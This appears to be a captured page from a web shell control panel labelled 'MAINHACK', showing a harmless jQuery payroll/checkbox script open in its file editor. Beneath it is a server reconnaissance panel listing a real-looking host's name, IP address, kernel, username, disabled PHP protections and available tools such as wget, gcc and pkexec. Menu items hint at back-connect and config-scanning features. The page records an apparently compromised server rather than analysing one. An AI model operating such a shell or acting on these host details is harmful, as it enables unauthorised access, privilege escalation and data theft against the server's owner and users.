[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: due-installment.js
$(function() { "use strict"; //check all checkAll(); //check all function function checkAll() { if ($(".checkbox_user").length == $(".checkbox_user:checked").length) { $(".checkbox_userAll").prop("checked", true); } else { $(".checkbox_userAll").prop("checked", false); } } // Check or Uncheck All checkboxes $(document).on('click', '.checkbox_userAll', function(e){ let checked = $(this).is(':checked'); if (checked) { $(".checkbox_user").each(function () { let menu_id = $(this).attr('data-menu_id'); $(this).prop("checked", true); $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }); $(".checkbox_userAll").prop("checked", true); } else { $(".checkbox_user").each(function () { let menu_id = $(this).attr('data-menu_id'); $(this).prop("checked", false); $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); }); $(".checkbox_userAll").prop("checked", false); } }); $(document).on('click', '.checkbox_user', function(e){ let menu_id = $(this).attr('data-menu_id'); if ($(".checkbox_user").length == $(".checkbox_user:checked").length) { $(".checkbox_userAll").prop("checked", true); if($(this).is(':checked')){ $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }else{ $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); } } else { $(".checkbox_userAll").prop("checked", false); if($(this).is(':checked')){ $("#qty"+menu_id).val(1); $("#qty"+menu_id).prop("disabled", false); }else{ $("#qty"+menu_id).prop("disabled", true); $("#qty"+menu_id).val(''); } } }); $(document).on('keyup', '.cal_row', function(e){ //calculate row cal_row(); }); }); //call calculate row cal_row(); function cal_row() { let total = 0; $(".row_counter").each(function () { let id = $(this).attr("data-id"); let salary = $("#salary_"+id).val(); let additional = $("#additional_"+id).val(); let subtraction = $("#subtraction_"+id).val(); if($.trim(salary) == "" || $.isNumeric(salary) == false){ salary=0; } if($.trim(additional) == "" || $.isNumeric(additional) == false){ additional=0; } if($.trim(subtraction) == "" || $.isNumeric(subtraction) == false){ subtraction=0; } let total_row = parseFloat($.trim(salary)) + parseFloat($.trim(additional)) - parseFloat($.trim(subtraction)); total+=total_row; $("#total_"+id).val(total_row.toFixed(2)); }); $(".total_amount").html(total.toFixed(2)); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.06 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002